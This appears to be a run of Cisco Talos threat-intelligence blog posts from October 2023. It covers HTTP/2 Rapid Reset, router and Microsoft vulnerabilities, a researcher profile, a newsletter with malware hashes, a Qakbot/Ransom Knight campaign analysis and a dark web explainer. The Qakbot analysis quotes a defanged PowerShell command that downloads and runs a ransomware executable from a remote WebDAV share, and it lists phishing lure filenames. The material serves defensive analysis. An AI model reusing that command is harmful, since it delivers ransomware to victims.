Cisco Talos is actively tracking the novel distributed denial-of-service (DDoS) attacks cloud services provider Cloudflare disclosed earlier this week. The techniques described in Cloudflare’s blog post resulted in a record-breaking DDoS attack and could facilitate much larger attacks in the future. 
CVE-2023-44487
CVE-2023-44487, a vulnerability in the

Wednesday, October 11, 2023 19:10

Cisco Talos is actively tracking the novel distributed denial-of-service (DDoS) attacks cloud services provider Cloudflare disclosed earlier this week. The techniques described in Cloudflare’s blog post resulted in a record-breaking DDoS attack and could facilitate much larger attacks in the future. 

**CVE-2023-44487**

CVE-2023-44487, a vulnerability in the HTTP/2 protocol, was recently used to launch intensive DDoS attacks against several targets. The problem lies in the way that HTTP/2 protocol handles request cancellations or resets. When a client issues a reset for an HTTP/2 request, this consumes resources on the server as it cancels the corresponding stream. However, after issuing a reset, the client can instantly open a new stream. The rapid opening and canceling of the HTTP/2 streams is what causes the denial of service. Because HTTP/2 has been integrated into a variety of different web platforms, it is likely that this vulnerability will have a widespread impact.

HTTP/2 made improvements over previous versions of the HTTP protocol, including changing the ways HTTP requests were handled. Earlier versions of HTTP rely on request-response serialization, in which a client sends a request to a server and then receives a response from that server over the same TCP connection. HTTP/2, meanwhile, formats requests and responses into HTTP/2 frames. Each frame has its own stream ID, used to identify which requests and responses correspond with each other. This allows for multiplexing and concurrent requests. This design is much more in line with the way web traffic occurs today, typically requiring large amounts of asynchronous requests for various types of data as web pages load. 

However, this new mechanism is where the denial-of-service vulnerability lies. Attackers have discovered that, by creating large amounts of requests and resets in a short period of time, they can consume valuable resources on HTTP/2 servers, resulting in a denial of service. The challenge is that when viewing certain types of web pages, large amounts of these requests are expected. This can also include some resets if the user is quickly scrolling through a page to speed up the rendering of the images ahead, for example. The other compounding factor is that there is a hard limit to the amount of concurrent connections HTTP/2 servers can support. According to RFC 9113, it is recommended that the SETTINGS\_MAX\_CONCURRENT\_STREAMS for an HTTP/2 server be no smaller than 100, “so as to not unnecessarily limit parallelism.” If an attacker with a large number of systems under their control can fill up these connection pools with open or half-open HTTP/2 connections the HTTP/2 server can be overwhelmed.

This is exactly what has been occurring at Cloudflare and other large providers. Beginning in late August, these networks started seeing large-scale DDoS attacks leveraging this novel technique eventually peaking at more than 200 million requests a second, accomplished with a botnet of only 20,000 systems. If this type of attack was launched with a much larger botnet, the traffic volume could be orders of magnitude greater and have a much larger potential impact. As such, organizations are urged to patch or mitigate as quickly as possible.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort SIDs:  
62519

What to know about the HTTP/2 Rapid Reset DDoS attacks

Attackers could exploit these vulnerabilities in the Yifan YF325 to carry out a variety of attacks, in some cases gaining the ability to execute arbitrary shell commands on the targeted device.

Wednesday, October 11, 2023 12:10

Cisco Talos recently disclosed 11 vulnerabilities, 10 of which are zero-days without a patch in an industrial cellular router. 

Attackers could exploit these vulnerabilities in the Yifan YF325 to carry out a variety of attacks, in some cases gaining the ability to execute arbitrary shell commands on the targeted device.  

The one other security issue Talos has disclosed over the past two weeks is a use-after-free vulnerability in an open-source port of WebKit, a popular content rendering engine used in popular web browsers like Apple Safari. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Yifan YF325 **

_Discovered by Francesco Benvenuto._ 

The Yifan YF325 is a cellular terminal device that offers Wi-Fi and ethernet connectivity capabilities to a network.  

The company’s website says the YF325, “has been widely used on M2M fields, such as self-service terminal industry, intelligent transportation, smart grid, industrial automation, telemetry, finance, POS, water supply, environment protection, post, weather, and so on.” 

Talos recently discovered 10 vulnerabilities in this device an adversary could exploit to carry out a variety of malicious actions, including TALOS-2023-1767 (CVE-2023-32632), which could allow an attacker to execute arbitrary shell commands on the targeted device. 

TALOS-2023-1762 (CVE-2023-24479) is perhaps the most serious of the set of vulnerabilities with a CVSS severity score of 9.8 out of 10. An attacker could exploit this vulnerability to change the admin credentials of the device and obtain root access. TALOS-2023-1752 (CVE-2023-32645) is also an authentication bypass vulnerability, but in this case, an attacker could simply use leftover debug credentials to log in as an administrator. 

The remaining vulnerabilities Talos disclosed in this product this week are buffer overflow vulnerabilities all triggered by specially crafted network requests: 

*   TALOS-2023-1761 (CVE-2023-35055 and CVE-2023-35056) 
*   TALOS-2023-1763 (CVE-2023-34365) 
*   TALOS-2023-1764 (CVE-2023-34346) 
*   TALOS-2023-1765 (CVE-2023-31272) 
*   TALOS-2023-1766 (CVE-2023-34426) 
*   TALOS-2023-1787 (CVE-2023-35965 and CVE-2023-35966) 
*   TALOS-2023-1788 (CVE-2023-35967 and CVE-2023-35968) 

All these vulnerabilities also have a severity score of 9.8. 

Talos is disclosing these vulnerabilities despite no official patch from Yifan, all in adherence to Cisco’s third-party vendor vulnerability disclosure policy. 

**Use-after-free vulnerability in WebKitGTK **

_Discovered by Marcin “Icewall” Noga._ 

Talos recently disclosed a use-after-free vulnerability in WebKitGTK’s MediaRecorder API. 

WebKitGTK is a full-featured, open-source port of the WebKit rendering engine. 

TALOS-2023-1831 (CVE-2023-39928) could lead to remote code execution, if the targeted user opens an attacker-controlled, malicious web page using an application that utilizes the affected version of WebKitGTK.

10 zero-day vulnerabilities in industrial cell router could lead to code execution, buffer overflows

Two other vulnerabilities that Microsoft is fixing Tuesday — CVE-2023-36563 in Microsoft WordPad and CVE-2023-41763 in the Skype communication platform — have already been publicly exploited in the wild and have proof-of-concept code available.

Wednesday, October 11, 2023 07:10

Microsoft disclosed 104 vulnerabilities in its extensive range of software and services, the most in a single Patch Tuesday since July.  

What is most notable is that this batch of vulnerabilities includes 12 that are considered “critical,” nine of which are remote code execution vulnerabilities in the Layer 2 Tunneling Protocol.   

Two other vulnerabilities that Microsoft is fixing Tuesday — CVE-2023-36563 in Microsoft WordPad and CVE-2023-41763 in the Skype communication platform — have already been publicly exploited in the wild and have proof-of-concept code available, making it more likely that attackers will try to exploit unpatched versions of these pieces of software. However, these issues are only considered “important.”  

The nine Layer 2 Tunneling Protocol vulnerabilities all require an attacker to win a race condition. A race condition is when two threads in a piece of code try to reach the same piece of data at the same time, and thus one action must be completed before the other.  

In this scenario, an attacker could exploit the Tunneling Protocol by sending a specially crafted protocol message to a Routing and Remote Access Service (RAS) server, which could lead to remote code execution on the RAS server machine. The vulnerabilities Microsoft disclosed and patched on Tuesday are:  

*   CVE-2023-38166 
*   CVE-2023-41765 
*   CVE-2023-41767 
*   CVE-2023-41768 
*   CVE-2023-41769 
*   CVE-2023-41770 
*   CVE-2023-41771 
*   CVE-2023-41773 
*   CVE-2023-41774 

The Layer 2 Tunneling Protocol allows remote users to connect to a machine, or site-to-site connectivity via a VPN. Vulnerabilities involving VPNs have come under a microscope since the discovery of the VPNFilter malware in 2018 that affected thousands of devices across the globe. 

A vulnerability in Fortinet’s SSL VPN, CVE-2018-13379, topped the U.S. Cybersecurity and Infrastructure Security Agency’s list of the most-exploited vulnerabilities in 2022, despite being disclosed back in 2018. U.S. officials also warned earlier this year of Volt Typhoon, a large APT believed to be backed by China’s government that is targeting networking devices to possibly gain a foothold onto U.S. military networks and critical infrastructure.  

Another critical remote execution vulnerability disclosed Tuesday, CVE-2023-35349, exists in the Microsoft Message Queuing service. An unauthenticated attacker could exploit this vulnerability to execute code on the targeted server. 

However, this vulnerability is only exploitable if the user has Message Queuing enabled. Microsoft stated in its advisory that users should check to see if there is a service running named “Message Queuing” and if TCP port 1801 is listening on the machine. 

One of the other critical vulnerabilities fixed this month is CVE-2023-36718, a remote code execution vulnerability in the Microsoft Virtual Trusted Platform Module. An attacker who exploits this vulnerability could perform a contained execution environment escape.  

The attack complexity is considered “high” and therefore less likely to be exploited, Microsoft said, because exploitation relies on complex memory shaping techniques and the attacker must at least be authenticated as a guest first.  

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 62486 - 62493 and 62508 - 62511, and Snort 3 signatures 300719 - 300722.

Microsoft patches 12 critical vulnerabilities, nine of which are in Layer 2 Tunneling Protocol

“I’m completely interested in the creative ways computers can break down,” Schultz jokes.

Monday, October 9, 2023 08:10

At this point in his career, Jaeson Schultz has seen nearly every type of online scam there is to see.

From fake bomb threats at schools, to “sextortion” campaigns, cryptocurrency mining, metaverse and more of the 2010s, to the earliest type of spam emails in the 1990s that promised to protect people from a Y2K meltdown or had the next great penny stock that the recipient needed to jump on asap, Schultz’s security career has spanned more than 25 years now.

At this point, nothing adversaries come up with surprises him, but that doesn’t mean he’s not looking for those surprises.

Schultz, a researcher for the Talos Outreach team focused specifically on email threats and spam, is currently looking to new and emerging technologies and how they play into attackers’ hands, including Web3, the metaverse (including the capital “M” Metaverse from the company Meta), cryptocurrency exchanges and the blockchain.

But his security experience dates back to the early days of email when he took a job with the state government of Nevada performing traditional IT troubleshooting and support. At the time, cybersecurity was not a specialized field, so by working in IT, you already needed to be interested in security, Schultz said.

“At that point, \[cybersecurity\] was more of a hobby for me in the late 80s and early 90s. It wasn’t an established profession, and you couldn’t study it. So, if you were into network administration, you were probably also into security,” he said.

Schultz started pursuing cybersecurity as a hobby, and he even attended some of the first DEF CON conferences, which today is known as one of the largest hacking conferences in the world.

That eventually led him to a job with Brightmail – one of the earliest anti-spam filtering offerings for email — and at the “abuse desk” for another email service provider, where he was tasked with stopping malicious users from sending spam.

At the time, the threats and tactics he saw then were the same as the ones most users get today: They focus heavily on social engineering, trying to trick users into providing personal information, sending money to the attacker or clicking on a malicious link that downloads malware.

Schultz eventually made his way to Cisco through the company’s acquisition of IronPort, which eventually became part of Cisco Talos nearly 10 years ago, where he became part of the Outreach team, conducting more public-facing threat research.

Today, Schultz said attacks are more sophisticated than before thanks to AI language models and years of experience on the attackers’ end. In his earlier career, Schultz said the wildest scam he saw was an email sender claiming to be a time traveler searching for pieces of their time machine, a tactic that (most) users would sniff out quickly in 2023.

“The techniques have evolved over time, but the basic themes have primarily remained the same,” he said.

One of the techniques Schultz is particularly interested in currently is DNS and URL manipulation. He’s written extensively for the Talos blog about how adversaries are using typosquatted domains — attacks in which bad actors use eerily similar URLs to legitimate sites to trick users into visiting an attacker-controlled page. For example, instead of visiting google.com, an attacker may use the domain googie.com in a spam email.

He’s also conducted research into attackers who distort the DNS system. DNS is essentially the backbone of browsing the internet and is what ensures attackers are visiting the page they want to land on — that typing in google.com will take the user to Google.com. Other attackers are using newly released top-level domains like .zip to trick targets into disclosing potentially sensitive files that end in that extension.

Perhaps in one of the more unlikely scenarios, Schultz is also researching how cosmic rays could interfere with network connections and mistakenly send users to the wrong destination.

“I’m completely interested in the creative ways computers can break down,” Schultz jokes.

Many users can feel hopeless when it comes to spam because they’re still getting emails and text messages every day despite the best efforts to research and continued calls to report certain phone numbers, emails or email subjects as spam. But Schultz said he’s driven by the victories he does get along the way.

“There are just so many people out there who are out to commit crimes online. And the number of people who actually get in trouble for committing those crimes is pretty low when you consider how much work goes into cybersecurity,” he said. “It gets under my skin when there are innocent users who get scammed by these people, like what if it was my mom or my grandma? It motivates me to go out there and disrupt their operations.”

Disruption may not even look like directly taking down email servers they’re using or other infrastructure. Even by writing a blog about an actor’s operations or talking to other security researchers at a conference, Schultz said his team’s work can make bad actors’ work more difficult in many ways. Even by just publicly exploiting their tactics, it forces them to change their strategy on the fly.

Schultz’s life doesn’t slow down outside the office, though. He juggles many interests like snow skating during the cooler months. He also owns a home in Ecuador where he likes to get away from the cold at times — Cisco’s work flexibility allows him to work remotely from either location to fit his schedule. Though he did joke his teammates get jealous when he’s working from Ecuador and brings a fresh coconut on a Webex call for a lunchtime drink.

Perhaps his most personal endeavor is running a toy shop in South Lake Tahoe, California with his family. Schultz’s late wife opened the store in 2019 — she wanted to be her own boss after years of having partners in other small business endeavors around the state.

After her death, Schultz said he and his three children wanted to keep the store running so he got more involved on a day-to-day basis. He even gets to put his IT admin hat back on while managing the online storefront and website.

“This was her project, she was always involved in different small businesses around Lake Tahoe, I talked her into buying this toy store so she would be the sole proprietor and not have to answer to anyone else,” Schultz said. “She bought it in 2019, and thankfully it survived the pandemic.”

Since getting more involved at the store, Schultz has gotten into collecting trading cards like Pokemon and the recently released Disney “Lorcana.” Interestingly, he’s interested in collecting real-world goods while the adversaries he typically tracks try to swindle users out of their virtual NFTs.

How looking at decades of spam led Jaeson Schultz from Y2K to the metaverse and cryptocurrency

Plus, Qakbot appears to be still active, despite efforts from the FBI and other international law enforcement agencies to disrupt the massive botnet.

Thursday, October 5, 2023 14:10

Welcome to this week’s edition of the Threat Source newsletter.

It’s Cybersecurity Awareness Month, which means it’s time to hug your nearest defender — they’re probably tired, could be facing burnout or just have had too much coffee today.

What makes the cybersecurity landscape even more fraught right now is that qualified analysts, researchers and security practitioners are having a hard time finding work. Several major security firms have recently experienced layoffs or have shut down entirely, at the same time the community is lamenting about a cybersecurity skills gap and a lack of workers.

I was watching TechCrunch’s “Disrupt” conference last week and I found it interesting that one particular panel was discussing the challenges of hiring in cybersecurity right now, and the host of the panel asked if there is a stigma around hiring workers who had been a part of major breaches or security incidents (think: a SolarWinds employee who may have been working there during the major supply chain attack that targeted their software).

I had no idea this was even a going concern among security hiring managers, and it makes no sense why there would be. So, I started looking through job board postings and security forums and found that many active security job hunters are afraid to list if they worked somewhere during a notable incident. For example, this user on r/cybersecurity asked last year if they should leave a job off their résumé if they worked there when a major data breach occurred, even though they were not directly involved in the breach whatsoever.

And even if they were, who cares?

Sherrod DeGrippo, the director of threat intelligence strategy at Microsoft, had the perfect answer for this on the aforementioned TechCrunch panel. She said that if she sees a prospective employee who worked somewhere during a security “trash fire,” she looks "at that as somebody who has been on the frontlines and been under fire. They know what to do and they've been through it, and I guarantee they have learned from it.”

There has always been a stigma around disclosing data breaches for companies and employees alike, with targets being afraid of negative press or scrutiny that comes from publicly admitting to a data breach or cyber attack.

And I can see why someone wouldn’t want to mention that during a job interview. There could be an inherent “stink” that comes from working somewhere that got owned or had a ton of negative headlines around it, but I feel like that’s a stigma that needs to go away immediately if the security community does have any hope of closing the skills gap.

Anyone who’s been through a major security event, as I know firsthand from talking to many of Talos’ incident responders, always has something to learn — from either a positive or negative experience. It’s the same in every field, too.

When I was a journalist, I can’t say that I never had to issue a correction for a story I wrote or apologize to a source for misquoting them. They were mistakes I had to make as a young professional and learn from. And in this job, I’ve made a fair share of mistakes, too, and probably will make more. The important thing is, that I learn from those mistakes and make changes to my processes going forward to avoid those mistakes.

I would imagine the same would be for any engineer who mistakenly left a vulnerability in some code or downloaded that software update that seemed legitimate but actually was packed with malware.

If you’ve worked in security for long enough, no matter for what company, you’ve been involved in a major security incident. That should not deter someone from hiring you for your next job, and you shouldn’t be leaving this off a résumé.

I am curious to know if this is a real issue or stigma that’s out there, so if you’re a hiring manager or job applicant who’s experienced this, DM us on Twitter!

**The one big thing**

Qakbot appears to be still active, despite efforts from the FBI and other international law enforcement agencies to disrupt the massive botnet. Talos researchers discovered that the threat actors behind the Qakbot malware have been conducting a campaign since early August 2023 in which they have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails. Notably, this activity appeared to begin before the FBI seized Qakbot infrastructure in late August and has been ongoing since, indicating the law enforcement operation may not have impacted Qakbot operators’ spam delivery infrastructure but rather only their command and control (C2) servers.

**Why do I care?**

Qakbot is one of the largest, most notable malware networks on the landscape currently, so any activity from this group is notable. But it’s particularly noteworthy now that the actor was able to recover so quickly after the FBI’s efforts. This group is still actively sending spam, despite what recent headlines may indicate. Though Talos has not seen the threat actors distributing Qakbot itself post-infrastructure takedown, we assess the malware will continue to pose a significant threat moving forward.

**So now what?**

Given that Qakbot’s operators remain active, they may choose to rebuild Qakbot infrastructure to fully resume their pre-takedown activity, so it’s important to monitor the Talos blog and other security research for any additional activity. Talos has new ClamAV signatures that can detect the malware associated with this current campaign, and there is a list of IOCs at the end of our blog post everyone should be adding to their blocklists or other detection.

**Top security headlines of the week**

**The company that manages the MOVEit file transfer software disclosed several vulnerabilities in one of its other products.** Progress Software, the makers of MOVEit, which was the subject of a large data breach responsible for dozens of follow-on attacks, urged users to patch WS\_FTP Server immediately. CVE-2023-40044 is a deserialization vulnerability in the Ad Hoc Transfer module in WS\_FTP Server that an attacker could exploit without authentication to execute remote code. In all, the company disclosed eight vulnerabilities last week and released hotfixes for all versions of the software. According to the company’s website, WS\_FTP Server offers “the unique business-grade features required to assure reliable and secure transfer of critical data.” The site lists several major customers who use the affected software, including the NFL’s Denver Broncos and clothing retailer H&M. (The Record by Recorded Future, Decipher)

**Google and Yahoo are implementing new rules around bulk email sending designed to reduce the amount of spam users receive and encourage more users to report spam.** Starting in early 2024, anyone sending more than 5,000 messages a day, will need to authenticate all messages using current authentication protocols like SPF or DKIM. All these emails must also offer a one-click unsubscribe option for recipients (so hopefully no more confusing “Are you sure you want to go?!” messages on email preference pages). In its announcement, Google says its current AI-based spam filters block 99.9 percent of spam emails. However, it’s become increasingly difficult as attackers have developed new methods of bypassing traditional blocking methods or create more convincing spam emails. (The Verge, ZDNet)

**The U.S. Department of Homeland Security is investigating if any floorplans for U.S. government buildings or other physical security information were affected by a data breach at a large government contractor.** Johnson Controls International, which manufacturers security systems and other hardware important to physical offices, disclosed this week that they are actively investigating a cyber attack "to assess what information was impacted" and is "executing our incident management and protection plan." An internal DHS memo that CNN obtained stated that “Until further notice, we should assume that \[the contractor\] stores DHS floor plans and security information tied to contracts on their servers.” At the time of the memo, DHS was concerned about the possibility about a government shutdown in the U.S. that could delay research, however, Congress avoided a shutdown over the weekend by passing a temporary spending bill. (CNN, Axios)

**Can’t get enough Talos?**

*   The Need to Know: What is the dark web?
*   Threat Roundup for Sept. 22 - 29
*   Talos Takes Ep. #156: Inside a Talos Incident Response emergency event
*   Cisco Cybersecurity Awareness Month homepage

**Upcoming events where you can find Talos**

**Bsides PDX** **(Oct. 6 - 7)**

Portland State University, Oregon, U.S.

**Cisco Cybersecurity Day** **(Oct. 11)**

Nuremberg Exhibition Center, Germany

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> _Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking._

**misecCON** **(Nov. 17)**

Lansing, Michigan

> _Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa  
**MD5:** 9403425a34e0c78a919681a09e5c16da  
**Typical Filename:** vincpsarzh.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440  
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e  
**Typical Filename:** iizbpyilb.bat  
**Claimed Product:** N/A  
**Detection Name:** Trojan.Agent.DDOH

**SHA 256:** 7f66d4580871e3ee6a35c8fef6da7ab26a93ba36b80279625328aaf184435efa  
**MD5:** e9a6b1346d1a2447cabb980f3cc5dd27  
**Typical Filename:** профиль 10 класс.exe  
**Claimed Product:** N/A  
**Detection Name:** Application\_Blocker

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

Is it bad to have a major security incident on your résumé? (Seriously I don’t know)

The threat actors behind the Qakbot malware have been conducting a campaign since early August 2023 in which they have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails.

Thursday, October 5, 2023 07:10

*   The threat actors behind the Qakbot malware have been conducting a campaign since early August 2023 in which they have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails.
*   Notably, this activity appeared to begin before the FBI seized Qakbot infrastructure in late August and has been ongoing since, indicating the law enforcement operation may not have impacted Qakbot operators’ spam delivery infrastructure but rather only their command and control (C2) servers.
*   Talos attributed this new campaign to Qakbot affiliates as the metadata found in LNK files used in this campaign matches the metadata from machines used in previous Qakbot campaigns “AA” and ”BB.”
*   Though we have not seen the threat actors distributing Qakbot itself post-infrastructure takedown, we assess the malware will  continue to pose a significant threat moving forward. We see this as likely as the developers were not arrested and are still operational, opening the possibility that they may choose to rebuild the Qakbot infrastructure.

In a late August 2023 operation involving the FBI and many international partners, law enforcement agencies seized the infrastructure and cryptocurrency assets used by the Qakbot malware, dealing considerable damage to the group’s operations. Many people in the security industry wondered whether this would mean that the Qakbot affiliates were gone forever or just temporarily out of work while rebuilding their infrastructure.

Talos assesses with moderate confidence that the threat actors behind Qakbot are still active and have been conducting a new campaign that started just before the takedown, distributing a variant of Cyclops/Ransom Knight ransomware along with the Remcos backdoor. We tracked this new activity by connecting the metadata in the LNK files used in the new campaign to the machines used in previous Qakbot campaigns.

In January 2023, we wrote a blog post on using metadata from LNK files to identify and track threat actors. We specifically detailed how one machine used in the “AA” campaign with a drive serial number of “0x2848e8a8” was later used in a campaign for the new botnet named **“**BB**”.** After our blog’s publication, primary Qakbot actors responsible for the  **“**AA”, “BB**”,** and **“**Obama**”** campaigns started to wipe out the metadata in their LNK files to make detection and tracking harder.

Talos identified new LNK files in August 2023 that were created on the same machine referenced above, but observed that the payload of the files pointed to a network share in the command line that served a variant of Ransom Knight ransomware. Further analysis of the files revealed they point to Powershell.exe and pass the following arguments to download the next stage:

_**\-c "explorer '\\\\89\[.\]23\[.\]96\[.\]203@80\\333\\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\\\89\[.\]23\[.\]96\[.\]203@80\\333\\information.exe**_

The command above opens Explorer.exe and attempts to access a remote network share on IP 89\[.\]23\[.\]96\[.\]203 using WebDAV on port 80. This method could be an attempt to bypass command line detection for downloading of a remote executable via PowerShell (T1105 Ingress Tool Transfer).

The filenames of these LNK files, with themes of urgent financial matters, suggest they are being distributed in phishing emails, which is consistent with previous Qakbot campaigns:

*   ATTENTION-Invoice-29-August.docx.lnk
*   bank transfer request.lnk
*   Booking info.pdf.lnk
*   Fattura NON pagata Agosto 2023.docx.lnk
*   FRAUD bank transfer report.pdf.lnk
*   invoice OTP bank.pdf.lnk
*   MANDATORY-Invoice-28-August.docx.lnk
*   NOT-paid-Invoice-26-August.pdf.lnk
*   Nuove coordinate bancarie e IBAN 2023.docx.lnk
*   Nuove coordinate bancarie e IBAN 2023.img.lnk
*   Pay-Invoices-29-August.pdf.lnk
*   URGENT-Invoice-27-August.docx.lnk

Some of the filenames are written in Italian, which suggests the threat actors may be targeting users in that region. The LNK files are being distributed inside Zip archives that also contain an XLL file. XLL is an extension used for Excel add-ins, and comes with an icon similar to other Excel file formats:

_Zip content for one of the phishing attachments._

According to our analysis, these XLL files are the Remcos backdoor which is executed along with Ransom Knight to give the threat actors access to the machine after the infection:

_VirusTotal information for XLL_ _file distributed along Ransom Knight LNK downloader._

The LNK file, on the other hand, downloads an executable file from remote IP 89\[.\]23\[.\]96\[.\]203 shown in the command line above via WebDAV, which is the actual Ransom Knight payload. This ransomware family is an updated version of the Cyclops ransomware-as-a-service, rewritten from scratch. The threat actor behind the Cyclops service announced the new variant in May 2023:

_Dark web forum post announcing Ransom Knight ransomware._

We do not believe the Qakbot threat actors are behind the ransomware-as-a-service offer, but are simply customers of the service. As this new operation has been ongoing since the beginning of August 2023 and has not stopped after the takedown, we believe the FBI operation didn’t affect Qakbot’s phishing email delivery infrastructure but only its command and control servers. Though we have not seen the threat actors distributing Qakbot post-infrastructure takedown, we assess the malware will likely continue to pose a significant threat moving forward. Given the operators remain active, they may choose to rebuild Qakbot infrastructure to fully resume their pre-takedown activity.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

ClamAV detections are available for this threat:  
Lnk.Downloader.Qakbot  
Win.Ransomware.Knight  
Win.Backdoor.Remcos

**IOCs**

Indicators of Compromise associated with this threat can be found here

Qakbot-affiliated actors distribute Ransom Night malware despite infrastructure takedown

What is the dark web, and how is it different from the deep web?

Wednesday, October 4, 2023 08:10

Most users interact with the internet through the web, and many of the threat actors we write about operate on the “dark web.” Broadly speaking, the dark web is a small portion of the “deep web,” where the deep web represents most of the Web.

We know, it’s confusing — let’s walk through an example.

The surface web is what you get to see when using your favorite search engine. You can search for banks, and you will find (most likely) the website of your local bank. The results will include publicly accessible information about services they offer, their address or hours of operation.

The iceberg of the deep web

Then, there is a part of this web page you are only able to see after you log in. Your name, address, transactions and account balance. This is an example of the deep web. That is, information with restricted access (for good reason).

If a breach occurs, and this information is sold by an adversary, it will show up on the dark web. The dark web is intentionally hidden and just accessible by specific anonymizing software like Tor (The Onion Router), I2P (Invisible Internet Project), Freenet or ZeroNet. It is important to note that these technologies were/are developed for good, but criminals abuse them.

From torproject.org:

> _“Our mission: To advance human rights and freedoms by creating and deploying free and open-source anonymity and privacy technologies, supporting their unrestricted availability and use, and furthering their scientific and popular understanding.”_

The easiest or most common way for a user to access the Tor Network is using the Tor Browser, an application based on Mozilla Firefox, but configured to route all traffic through the Tor Network, thereby enhancing users’ privacy and anonymity.

Tor works by sending traffic through three random relays in the Tor network. The last relay (exit relay) then sends the traffic out onto the public internet.

Firefox exposing a user’s real IP address.

Tor browser through the Tor network.

Tor also offers host services. Those webpages are then accessible by a .onion TLD, just inside the Tor network.

.onion not available.

onion available within Tor network.

An example service is shown above. Torch is a search engine in and for the Tor network. Other examples are the BBC or New York Times, which make their pages available on Tor to thwart censorship.

The anonymity for consumers and publishers is interesting for adversaries, as it provides an additional layer of obfuscation which makes it harder for law enforcement agencies to track down transactions to a physical location. That’s why there are marketplaces and forums hosted for content such as malware, stolen credentials and alike, which are monitored by our teams.

While Tor provides a high level of anonymity and privacy, there are certain aspects of online activity that Tor does not fully protect against.

Individuals requiring an even higher-level privacy and security, or the need to pass non-HTTP traffic through the Tor network should look at Tails, The Amnesic Incognito Live System and its supporting documentation.

If you’d like to continue to learn more about the basics of the topics we cover on the Talos blog, read the rest of our entries in The Need to Know series.

What is the dark web?

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 22 and Sept. 29. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for September 22 to September 29

Two notable vulnerabilities in Google Chrome should be patched asap, and an allegedly new ransomware-as-a-service group.

Thursday, September 28, 2023 14:09

Welcome to this week’s edition of the Threat Source newsletter.

Since Elon Musk first started talking about purchasing Twitter/X around this time last year, one of his main sticking points has been how many bot accounts are on the platform and how that potentially affects advertising revenue and user counts.

